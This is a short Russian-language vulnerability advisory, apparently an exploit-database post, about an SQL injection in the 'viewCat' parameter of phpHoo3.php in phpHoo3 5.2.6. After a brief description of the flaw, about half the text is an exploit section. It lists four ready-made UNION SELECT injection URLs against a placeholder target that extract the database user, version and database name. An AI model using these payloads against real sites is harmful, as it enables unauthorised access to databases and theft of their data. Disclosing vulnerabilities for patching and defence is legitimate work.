Программа: phpHoo3 5.2.6
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «viewCat» сценарием phpHoo3.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,
CONVERT(CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())+using+latin1),0,0,0,0,0--
www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,
0,user(),@@version,0,0,0,0,0--
www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0, CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--
www.Target.com/phpHoo/phpHoo3.php?viewCat=-1+UNION+
SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--
